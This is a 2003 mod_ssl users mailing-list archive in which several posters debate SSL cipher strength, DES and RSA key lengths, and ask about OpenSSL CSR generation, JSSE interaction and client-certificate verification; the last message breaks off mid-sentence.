> minute attack.
>
> Example 2:
> A "sealed" court case which is mandated to be sealed for 20 years needs to
> be protected by a cipher capable of using a large enough keyspace to keep
a
> sustained attack against the data at bay for that 20 years.
>
> Herein lies the challenge in the practical utilization of cryptography...
> how do we know what will protect data for 20 years?  We don't.  So we make
> educated guesses.  We make compromizes.  We use "best-available".  In the
> example of the password above, 56 bit DES would be a reasonable choice.
> It's fast, but weak - yet strong enough to keep that password encrypted
for
> the two or three - heck, six, minutes it would be attacked. (this is not
to
> say that one should use the weakest available cipher for any given problem
> set!  3DES, AES, or Blowfish would be a much better choice in any case.)
In
> the example of the sealed court records, we're not worried about
transaction
> speed or decryption speed so an asymmetric cipher capable of utilizing a
> 4096 bit (or larger!) private key is much more appropriate.
>
> Kind Regards,
> -dsp
>
>
> -----Original Message-----
> From: owner-modssl-users@modssl.org
> [mailto:owner-modssl-users@modssl.org]On Behalf Of Arthur Chan
> Sent: Sunday, August 10, 2003 6:39 AM
> To: modssl-users@modssl.org
> Subject: Re: high-grade vs low-grade encryption with MD5 and DES
>
>
> This is really symptomatic of our industry, isn't it? We seen to be our
own
> worse enemy.
> Back in 95, it took that French student days to crack the 40-bit codes.
Now
> we are talking about minutes... its disheartening. Merde. I really wonder
> how some of those MS sites survive these days...
>
> ----- Original Message -----
> From: "Dave Paris" 
> To: 
> Sent: Monday, August 11, 2003 06:16 PM
> Subject: Re: high-grade vs low-grade encryption with MD5 and DES
>
>
> > "compromised" is probably a poor word to use, "pointlessly weak" is
> > more accurate.  If you're going to use SSL and you're dealing with data
> > that needs to be protected longer than 5 minutes, use 128bit SSL.
> >
> > -dsp
> >
> > On Sunday, Aug 10, 2003, at 02:25 US/Eastern, Arthur Chan wrote:
> >
> > > Hi all.
> > > Verisign currently has a discount on both a high grade (128bits) SSL
> > > encrypted and a low grade (40bits) SSL encrypted certificates. The
> > > former is
> > > priced at US$895 and the latter at US$1395.
> > > I noticed some sites also present Verisign certificates with
low-grade,
> > > 54-bits encryption from their Microsoft/IIS servers. However I cannot
> > > find a
> > > 54-bits certificate in
> > > www.verisign.com/products/site/commerce/index.html
> > > Is this 54-bits affair only for Microsoft / IIS ???
> > > Is low-grade encryption with 40 and 54 bits considered "compromised"
> > > ???
> > > Are there any finance/insurance industry standard requiring a 128
bits,
> > > high-grade encryption ???
> > >
> > > ______________________________________________________________________
> > > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > > User Support Mailing List                      modssl-users@modssl.org
> > > Automated List Manager                            majordomo@modssl.org
> > >
> >
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>
>
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug 11 14:39:59 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 97569A8944; Mon, 11 Aug 2003 14:39:59 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail4.hitachi.co.jp (mail4.hitachi.co.jp [133.145.228.5])
	by master.modssl.org (Postfix) with ESMTP id 61E55A8933
	for ; Mon, 11 Aug 2003 14:39:57 +0200 (CEST)
Received: from mc1.mcg.hitachi.co.jp by mail4.hitachi.co.jp (8.9.3p2/3.7W-mail4) id VAA16116; Mon, 11 Aug 2003 21:39:54 +0900 (JST)
Received: (from root@localhost)
	by mc1.mcg.hitachi.co.jp (8.11.6+Sun/8.11.6) id h7BCdrY13438
	for ; Mon, 11 Aug 2003 21:39:53 +0900 (JST)
Received: from unknown [192.168.2.1] by mc1.mcg.hitachi.co.jp with SMTP id XAA13437 ; Mon, 11 Aug 2003 21:39:53 +0900
Received: from navsg3.hitachi.co.jp by navsg3.hitachi.co.jp (8.9.3/3.7W-navsg3) id VAA20605; Mon, 11 Aug 2003 21:39:52 +0900 (JST)
Received: from mlsv4.itg.hitachi.co.jp ([158.213.165.103])
 by navsg3.hitachi.co.jp (NAVGW 2.5.2.17) with SMTP id M2003081121395209693
 ; Mon, 11 Aug 2003 21:39:52 +0900
Received: from navgw4.itg.hitachi.co.jp by mlsv4.itg.hitachi.co.jp (8.12.6/8.12.6) id h7BCdqBV005886; Mon, 11 Aug 2003 21:39:52 +0900
Received: from bisdgw.bisd.hitachi.co.jp ([133.144.87.253])
 by navgw4.itg.hitachi.co.jp (SAVSMTP 3.1.1.32) with SMTP id M2003081121395112140
 ; Mon, 11 Aug 2003 21:39:51 +0900
Received: from bisdmail.bisd.hitachi.co.jp
	by bisdgw.bisd.hitachi.co.jp (8.9.3+3.2W/3.7W-bisdgw) with ESMTP id VAA22579;
	Mon, 11 Aug 2003 21:39:52 +0900 (JST)
	(envelope-from kiyoshi@bisd.hitachi.co.jp)
Received: from localhost
	by bisdmail.bisd.hitachi.co.jp (8.11.3/3.7W-bisdmail) with ESMTP id h7BCdpo11342;
	Mon, 11 Aug 2003 21:39:51 +0900 (JST)
	(envelope-from kiyoshi@bisd.hitachi.co.jp)
Date: Mon, 11 Aug 2003 21:39:24 +0900 (JST)
Message-Id: <20030811.213924.41683124.kiyoshi@bisd.hitachi.co.jp>
To: modssl-users@modssl.org, achana@saysit.com.hk
Cc: kiyoshi@bisd.hitachi.co.jp
Subject: Re: high-grade vs low-grade encryption with MD5 and DES
From: Kiyoshi Watanabe 
In-Reply-To: <000801c35f35$d5284f40$0200a8c0@com>
References: 
	<000801c35f35$d5284f40$0200a8c0@com>
X-Mailer: Mew version 2.1 on Emacs 20.7 / Mule 4.0 (HANANOEN)
Mime-Version: 1.0
Content-Type: Text/Plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Kiyoshi Watanabe 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


Hi, I never see 4096 bits keys used in the SSL transactions. I once
see the key in the root CA in the natioanl PKI initiative in one
country under very restrictive usage with customized application.

I am just wondering if the market is moving to use such a longer bits
key.

-Kiyoshi
Kiyoshi Watanabe

> Practicality : do not use 4096 bits server side private key. No, not even
> 2048.
> Key size larger than 1024 is not supported by those bollocky client
> browsers. Netscape and MSIE4 come to mind.
> Regards,
> Arthur Chan
> 
> ----- Original Message -----
> From: "Dave Paris" 
> To: 
> Sent: Monday, August 11, 2003 07:34 PM
> Subject: RE: high-grade vs low-grade encryption with MD5 and DES
> 
> 
> > The "5 minutes" I mentioned doesn't implicitly refer to the amount of time
> > needed to crack the ciphertext, but more the type of data and the amount
> of
> > time it needs to be protected.
> >
> > A couple examples:
> >
> > Example 1:
> > A password which will only work for the next ten minutes only needs to be
> > protected by encryption capable of rendering the text sufficiently
> scrambled
> > for that 10 minute duration.  This might mean it would take an attacker 1
> > minute to obtain the ciphertext and get it into a state where it can be
> > cryptanalyzed.  Four or five minutes to determine the cipher used.  Then
> the
> > attacker is left with only 3 or 4 minutes to break the cipher if they need
> > one minute to actually use the password.  So, how strong do you need
> > encryption in this case?  Only long enough to hold out against a 3 to 4
> > minute attack.
> >
> > Example 2:
> > A "sealed" court case which is mandated to be sealed for 20 years needs to
> > be protected by a cipher capable of using a large enough keyspace to keep
> a
> > sustained attack against the data at bay for that 20 years.
> >
> > Herein lies the challenge in the practical utilization of cryptography...
> > how do we know what will protect data for 20 years?  We don't.  So we make
> > educated guesses.  We make compromizes.  We use "best-available".  In the
> > example of the password above, 56 bit DES would be a reasonable choice.
> > It's fast, but weak - yet strong enough to keep that password encrypted
> for
> > the two or three - heck, six, minutes it would be attacked. (this is not
> to
> > say that one should use the weakest available cipher for any given problem
> > set!  3DES, AES, or Blowfish would be a much better choice in any case.)
> In
> > the example of the sealed court records, we're not worried about
> transaction
> > speed or decryption speed so an asymmetric cipher capable of utilizing a
> > 4096 bit (or larger!) private key is much more appropriate.
> >
> > Kind Regards,
> > -dsp
> >
> >
> > -----Original Message-----
> > From: owner-modssl-users@modssl.org
> > [mailto:owner-modssl-users@modssl.org]On Behalf Of Arthur Chan
> > Sent: Sunday, August 10, 2003 6:39 AM
> > To: modssl-users@modssl.org
> > Subject: Re: high-grade vs low-grade encryption with MD5 and DES
> >
> >
> > This is really symptomatic of our industry, isn't it? We seen to be our
> own
> > worse enemy.
> > Back in 95, it took that French student days to crack the 40-bit codes.
> Now
> > we are talking about minutes... its disheartening. Merde. I really wonder
> > how some of those MS sites survive these days...
> >
> > ----- Original Message -----
> > From: "Dave Paris" 
> > To: 
> > Sent: Monday, August 11, 2003 06:16 PM
> > Subject: Re: high-grade vs low-grade encryption with MD5 and DES
> >
> >
> > > "compromised" is probably a poor word to use, "pointlessly weak" is
> > > more accurate.  If you're going to use SSL and you're dealing with data
> > > that needs to be protected longer than 5 minutes, use 128bit SSL.
> > >
> > > -dsp
> > >
> > > On Sunday, Aug 10, 2003, at 02:25 US/Eastern, Arthur Chan wrote:
> > >
> > > > Hi all.
> > > > Verisign currently has a discount on both a high grade (128bits) SSL
> > > > encrypted and a low grade (40bits) SSL encrypted certificates. The
> > > > former is
> > > > priced at US$895 and the latter at US$1395.
> > > > I noticed some sites also present Verisign certificates with
> low-grade,
> > > > 54-bits encryption from their Microsoft/IIS servers. However I cannot
> > > > find a
> > > > 54-bits certificate in
> > > > www.verisign.com/products/site/commerce/index.html
> > > > Is this 54-bits affair only for Microsoft / IIS ???
> > > > Is low-grade encryption with 40 and 54 bits considered "compromised"
> > > > ???
> > > > Are there any finance/insurance industry standard requiring a 128
> bits,
> > > > high-grade encryption ???
> > > >
> > > > ______________________________________________________________________
> > > > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > > > User Support Mailing List                      modssl-users@modssl.org
> > > > Automated List Manager                            majordomo@modssl.org
> > > >
> > >
> > > ______________________________________________________________________
> > > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > > User Support Mailing List                      modssl-users@modssl.org
> > > Automated List Manager                            majordomo@modssl.org
> >
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> >
> >
> >
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug 11 14:58:31 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 51EDDA8944; Mon, 11 Aug 2003 14:58:31 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from wink.pobox.com (wink.pobox.com [207.106.49.21])
	by master.modssl.org (Postfix) with ESMTP id 794D0A8933
	for ; Mon, 11 Aug 2003 14:58:29 +0200 (CEST)
Received: from texas.pobox.com (texas.pobox.com [64.49.223.111])
	by wink.pobox.com (Postfix) with ESMTP id 4BE58FE69
	for ; Mon, 11 Aug 2003 08:58:23 -0400 (EDT)
Received: from yourpa86z1i3g7 (unknown [209.210.104.210])
	by texas.pobox.com (Postfix) with ESMTP id 85FBE45457
	for ; Mon, 11 Aug 2003 08:58:21 -0400 (EDT)
From: "Dave Paris" 
To: 
Subject: RE: high-grade vs low-grade encryption with MD5 and DES
Date: Mon, 11 Aug 2003 08:58:22 -0400
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
In-Reply-To: <000801c35f35$d5284f40$0200a8c0@com>
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Dave Paris" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I wasn't [specifically] referring to SSL.  In fact, the mere premise of
passing data designated as "must be protected" for a 20 year timeframe over
128 bit SSL (with a 1024 bit client key) frightens me to the core.  (If the
encryption of this data was protecting *you* from [we'll go on a limb here
and be dramatic] an crime organization with tens of millions of dollars to
devote to discovering who turned them in to the Feds, would *you* want it
sent over a 1024 bit SSL link?!)

*THIS* is what's really wrong with the industry - we have people using
technology in inappropriate situations.  Too many who DO understand how to
use it appropriately with the responsibilities, restrictions, and caveats
that come with that understanding are either unable or unwilling to convince
those in the position of "final decision maker" of just how WRONG certain
applications/implementations actually are.

Bottom line, if the available protocols & application cannot support the
data protection requirements - DO NOT send the data over that link.

For a baseline dissertation on key lengths for symmetric and asymmetric
ciphers, please see:
http://www.giac.org/practical/gsec/Lorraine_Williams_GSEC.pdf

Additionally, RSA currently recommends 2048 bit keys for "extremely valuable
keys".  My gut says that knowing about devices like TWIRL, et al. make 2048
bit keys risky for long-term protection because God only knows what devices
we *don't* know about.

-dsp

-----Original Message-----
From: owner-modssl-users@modssl.org
[mailto:owner-modssl-users@modssl.org]On Behalf Of Arthur Chan
Sent: Sunday, August 10, 2003 7:52 AM
To: modssl-users@modssl.org
Subject: Re: high-grade vs low-grade encryption with MD5 and DES


Practicality : do not use 4096 bits server side private key. No, not even
2048.
Key size larger than 1024 is not supported by those bollocky client
browsers. Netscape and MSIE4 come to mind.
Regards,
Arthur Chan

----- Original Message -----
From: "Dave Paris" 
To: 
Sent: Monday, August 11, 2003 07:34 PM
Subject: RE: high-grade vs low-grade encryption with MD5 and DES


> The "5 minutes" I mentioned doesn't implicitly refer to the amount of time
> needed to crack the ciphertext, but more the type of data and the amount
of
> time it needs to be protected.
>
[...]
> Example 2:
> A "sealed" court case which is mandated to be sealed for 20 years needs to
> be protected by a cipher capable of using a large enough keyspace to keep
a
> sustained attack against the data at bay for that 20 years.
>
> Herein lies the challenge in the practical utilization of cryptography...
> how do we know what will protect data for 20 years?  We don't.  So we make
> educated guesses.  We make compromizes.  We use "best-available".  In the
> example of the password above, 56 bit DES would be a reasonable choice.
> It's fast, but weak - yet strong enough to keep that password encrypted
for
> the two or three - heck, six, minutes it would be attacked. (this is not
to
> say that one should use the weakest available cipher for any given problem
> set!  3DES, AES, or Blowfish would be a much better choice in any case.)
In
> the example of the sealed court records, we're not worried about
transaction
> speed or decryption speed so an asymmetric cipher capable of utilizing a
> 4096 bit (or larger!) private key is much more appropriate.
[...]


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug 12 17:55:26 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 96816A8948; Tue, 12 Aug 2003 17:55:26 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from sottmxssm.entrust.com (sottmxssm.entrust.com [216.191.252.10])
	by master.modssl.org (Postfix) with ESMTP id D1B54A8934
	for ; Tue, 12 Aug 2003 17:55:24 +0200 (CEST)
Received: from sottguard01.entrust.com (sottguard01.entrust.com [10.4.61.249])
	by sottmxssm.entrust.com (Switch-2.2.6/Switch-2.2.4) with SMTP id V7CF2FYH29857
	for ; Tue, 12 Aug 2003 11:51:35 -0400
Received: (qmail 18343 invoked by uid 64014); 12 Aug 2003 15:48:10 -0000
Received: from Robert.Lagana@entrust.com by sottguard01.entrust.com with AmikaGuardian-Server-1.1.2 (Processed in 0.42013 secs); 12 Aug 2003 15:48:10 -0000
Received: from unknown (HELO SOTTMXS01.entrust.com) (10.4.61.7)
  by 10.4.61.249 with SMTP; 12 Aug 2003 15:48:10 -0000
Received: by sottmxs01.entrust.com with Internet Mail Service (5.5.2656.59)
	id ; Tue, 12 Aug 2003 11:55:20 -0400
Message-ID: 
From: Robert Lagana 
To: "'modssl-users@modssl.org'" 
Subject: unique cipher-text
Date: Tue, 12 Aug 2003 11:55:19 -0400
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2656.59)
Content-Type: text/plain;
	charset="ISO-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Robert Lagana 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

Does anyone know why using the req -new option from the same private key,
twice does not generate a unique CSR?

As an example:

I have an existing private key. I then generate a CSR from it.

Openssl req -new -key privakey.key -out csr.txt

I then generate another CSR from the private key and use identical DN
information.

I can understand why the exponents and modules are the same.. because they
are using the same private key, however why does the cipher text look the
same? Isn't it suppose to be random?


I have trying to find the answer at http://www.openssl.org/docs/ but
cannot..

Basically, I'd like to know what is responsible for the cipher text output?
and can it be randomized each time without changing the DN levels.

Thanks,
R



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Aug 13 03:24:01 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 99DA8A8948; Wed, 13 Aug 2003 03:24:01 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from hanghau.pacific.net.hk (hanghau.pacific.net.hk [202.64.33.137])
	by master.modssl.org (Postfix) with ESMTP id 71E04A8933
	for ; Wed, 13 Aug 2003 03:23:59 +0200 (CEST)
Received: from westnet ([202.64.41.172])
        by hanghau.pacific.net.hk with SMTP
        id h7D1NrsQ027713 for ; Wed, 13 Aug 2003 09:23:54 +0800 (CST)
Message-ID: <002401c3606f$06492880$0200a8c0@com>
From: "Arthur Chan" 
To: 
References: <000801c35f35$d5284f40$0200a8c0@com> <20030811.213924.41683124.kiyoshi@bisd.hitachi.co.jp>
Subject: Re: high-grade vs low-grade encryption with MD5 and DES
Date: Tue, 12 Aug 2003 09:14:03 +0800
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Arthur Chan" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi Yoshi.
I have been looking around and  haven't seen 4096 in use either. I think
most companies have settled for the standard by default ie 1024/128 and it
would be a lot of work to change that. What do they do under those
circumstances ? Revoke the old certificate and issue new one ? You can do
your own survey, simply throw up the log-on screen for the major banks (and
second tier ones), then look at their certificates. They all have 1024/128.
I can't see a long live for 1024/128, maybe a few more years. Something is
bound to happen.
Also, I doubt whether it is practical, seeing how some (slightly) older
browsers cannot handle that.
Arthur
----- Original Message -----
From: "Kiyoshi Watanabe" 
To: ; 
Cc: 
Sent: Monday, August 11, 2003 08:39 PM
Subject: Re: high-grade vs low-grade encryption with MD5 and DES


>
> Hi, I never see 4096 bits keys used in the SSL transactions. I once
> see the key in the root CA in the natioanl PKI initiative in one
> country under very restrictive usage with customized application.
>
> I am just wondering if the market is moving to use such a longer bits
> key.
>
> -Kiyoshi
> Kiyoshi Watanabe
>
> > Practicality : do not use 4096 bits server side private key. No, not
even
> > 2048.
> > Key size larger than 1024 is not supported by those bollocky client
> > browsers. Netscape and MSIE4 come to mind.
> > Regards,
> > Arthur Chan
> >
> > ----- Original Message -----
> > From: "Dave Paris" 
> > To: 
> > Sent: Monday, August 11, 2003 07:34 PM
> > Subject: RE: high-grade vs low-grade encryption with MD5 and DES
> >
> >
> > > The "5 minutes" I mentioned doesn't implicitly refer to the amount of
time
> > > needed to crack the ciphertext, but more the type of data and the
amount
> > of
> > > time it needs to be protected.
> > >
> > > A couple examples:
> > >
> > > Example 1:
> > > A password which will only work for the next ten minutes only needs to
be
> > > protected by encryption capable of rendering the text sufficiently
> > scrambled
> > > for that 10 minute duration.  This might mean it would take an
attacker 1
> > > minute to obtain the ciphertext and get it into a state where it can
be
> > > cryptanalyzed.  Four or five minutes to determine the cipher used.
Then
> > the
> > > attacker is left with only 3 or 4 minutes to break the cipher if they
need
> > > one minute to actually use the password.  So, how strong do you need
> > > encryption in this case?  Only long enough to hold out against a 3 to
4
> > > minute attack.
> > >
> > > Example 2:
> > > A "sealed" court case which is mandated to be sealed for 20 years
needs to
> > > be protected by a cipher capable of using a large enough keyspace to
keep
> > a
> > > sustained attack against the data at bay for that 20 years.
> > >
> > > Herein lies the challenge in the practical utilization of
cryptography...
> > > how do we know what will protect data for 20 years?  We don't.  So we
make
> > > educated guesses.  We make compromizes.  We use "best-available".  In
the
> > > example of the password above, 56 bit DES would be a reasonable
choice.
> > > It's fast, but weak - yet strong enough to keep that password
encrypted
> > for
> > > the two or three - heck, six, minutes it would be attacked. (this is
not
> > to
> > > say that one should use the weakest available cipher for any given
problem
> > > set!  3DES, AES, or Blowfish would be a much better choice in any
case.)
> > In
> > > the example of the sealed court records, we're not worried about
> > transaction
> > > speed or decryption speed so an asymmetric cipher capable of utilizing
a
> > > 4096 bit (or larger!) private key is much more appropriate.
> > >
> > > Kind Regards,
> > > -dsp
> > >
> > >
> > > -----Original Message-----
> > > From: owner-modssl-users@modssl.org
> > > [mailto:owner-modssl-users@modssl.org]On Behalf Of Arthur Chan
> > > Sent: Sunday, August 10, 2003 6:39 AM
> > > To: modssl-users@modssl.org
> > > Subject: Re: high-grade vs low-grade encryption with MD5 and DES
> > >
> > >
> > > This is really symptomatic of our industry, isn't it? We seen to be
our
> > own
> > > worse enemy.
> > > Back in 95, it took that French student days to crack the 40-bit
codes.
> > Now
> > > we are talking about minutes... its disheartening. Merde. I really
wonder
> > > how some of those MS sites survive these days...
> > >
> > > ----- Original Message -----
> > > From: "Dave Paris" 
> > > To: 
> > > Sent: Monday, August 11, 2003 06:16 PM
> > > Subject: Re: high-grade vs low-grade encryption with MD5 and DES
> > >
> > >
> > > > "compromised" is probably a poor word to use, "pointlessly weak" is
> > > > more accurate.  If you're going to use SSL and you're dealing with
data
> > > > that needs to be protected longer than 5 minutes, use 128bit SSL.
> > > >
> > > > -dsp
> > > >
> > > > On Sunday, Aug 10, 2003, at 02:25 US/Eastern, Arthur Chan wrote:
> > > >
> > > > > Hi all.
> > > > > Verisign currently has a discount on both a high grade (128bits)
SSL
> > > > > encrypted and a low grade (40bits) SSL encrypted certificates. The
> > > > > former is
> > > > > priced at US$895 and the latter at US$1395.
> > > > > I noticed some sites also present Verisign certificates with
> > low-grade,
> > > > > 54-bits encryption from their Microsoft/IIS servers. However I
cannot
> > > > > find a
> > > > > 54-bits certificate in
> > > > > www.verisign.com/products/site/commerce/index.html
> > > > > Is this 54-bits affair only for Microsoft / IIS ???
> > > > > Is low-grade encryption with 40 and 54 bits considered
"compromised"
> > > > > ???
> > > > > Are there any finance/insurance industry standard requiring a 128
> > bits,
> > > > > high-grade encryption ???
> > > > >
> > > > >
______________________________________________________________________
> > > > > Apache Interface to OpenSSL (mod_ssl)
www.modssl.org
> > > > > User Support Mailing List
modssl-users@modssl.org
> > > > > Automated List Manager
majordomo@modssl.org
> > > > >
> > > >
> > > >
______________________________________________________________________
> > > > Apache Interface to OpenSSL (mod_ssl)
www.modssl.org
> > > > User Support Mailing List
modssl-users@modssl.org
> > > > Automated List Manager
majordomo@modssl.org
> > >
> > > ______________________________________________________________________
> > > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > > User Support Mailing List                      modssl-users@modssl.org
> > > Automated List Manager                            majordomo@modssl.org
> > >
> > >
> > >
> > > ______________________________________________________________________
> > > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > > User Support Mailing List                      modssl-users@modssl.org
> > > Automated List Manager                            majordomo@modssl.org
> >
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Aug 13 03:34:56 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 2E622A8948; Wed, 13 Aug 2003 03:34:56 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from hanghau.pacific.net.hk (hanghau.pacific.net.hk [202.64.33.137])
	by master.modssl.org (Postfix) with ESMTP id BB02BA8933
	for ; Wed, 13 Aug 2003 03:34:53 +0200 (CEST)
Received: from westnet ([202.64.41.172])
        by hanghau.pacific.net.hk with SMTP
        id h7D1YpsQ003703 for ; Wed, 13 Aug 2003 09:34:52 +0800 (CST)
Message-ID: <003001c36070$8e207000$0200a8c0@com>
From: "Arthur Chan" 
To: 
Subject: How does JSSE interact with OpenSSL ?
Date: Tue, 12 Aug 2003 09:25:02 +0800
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Arthur Chan" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi All,
Well it seems to me with java's URLConnection as distinct from
HttpURLConnection, *some* data slip through un-encrypted. Oddly, only data
declared as "text" e.g. Oracle's VARCHAR2, slip through into the Net in
human readible form.
First, I thought JSSE is part of the standard install for j2sdk1.4 , second
I imagined that using URLConnection, somehow automagically the data will be
encrypted by OpenSSL when going through apache mod_ssl.
Does anyone know how JSSE and OpenSSL interact ??? I mean, the only way
around this dilemma is to programmatically encrypt the data before sending
it through openssl. Does that sound odd to anyone  :-o  ???

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Aug 13 13:39:37 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id AE474A8948; Wed, 13 Aug 2003 13:39:37 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from bender.bawue.de (bender.bawue.de [193.197.13.1])
	by master.modssl.org (Postfix) with ESMTP id 502A1A8933
	for ; Wed, 13 Aug 2003 13:39:34 +0200 (CEST)
Received: from my.bawue.de (bender.bawue.de [193.197.13.1])
	by bender.bawue.de (Postfix) with ESMTP id DF36E1B8F8
	for ; Wed, 13 Aug 2003 13:39:31 +0200 (MEST)
Received: from 192.6.76.72
        (SquirrelMail authenticated user haen)
        by my.bawue.de with HTTP;
        Wed, 13 Aug 2003 13:39:32 +0200 (MEST)
Message-ID: <47073.192.6.76.72.1060774772.squirrel@my.bawue.de>
Date: Wed, 13 Aug 2003 13:39:32 +0200 (MEST)
Subject: RE: Certificate verification problem (required client certificate)
From: "Herbert Neugebauer" 
To: modssl-users@modssl.org
User-Agent: SquirrelMail/1.4.0
MIME-Version: 1.0
Content-Type: text/plain;charset=iso-8859-1
X-Priority: 3
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Herbert Neugebauer" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello,

I posted this question already some days ago, but did not yet receive any
hint. Does really no-one have any idea what could be the problem?

-----------------------

I'm having a strange problem with Apache 2.0.45, mod_ssl with openssl
0.9.6i  (and possibly a factor also tomcat 4.1.27 server, client IE6 with
Java 1.4 plugin from Sun).

The web-server should run all applications only over SSL and with client
certificate verification enabled.

So I set up all the necessary configuration, including server and client
certificates (our company has it's own internal CA), and moved three
different applications from the non-SSL to the SSL virtual-host.
Everything works fine, the applications can access the "environment
variables", where the user-ID coming from the certificate is stored, in
order to authenticate the users and provide user-specific content. One of
the working applications is PHP based, another one is JSP based, so via
Tomcat. (only explaining this so that it is clear the whole server
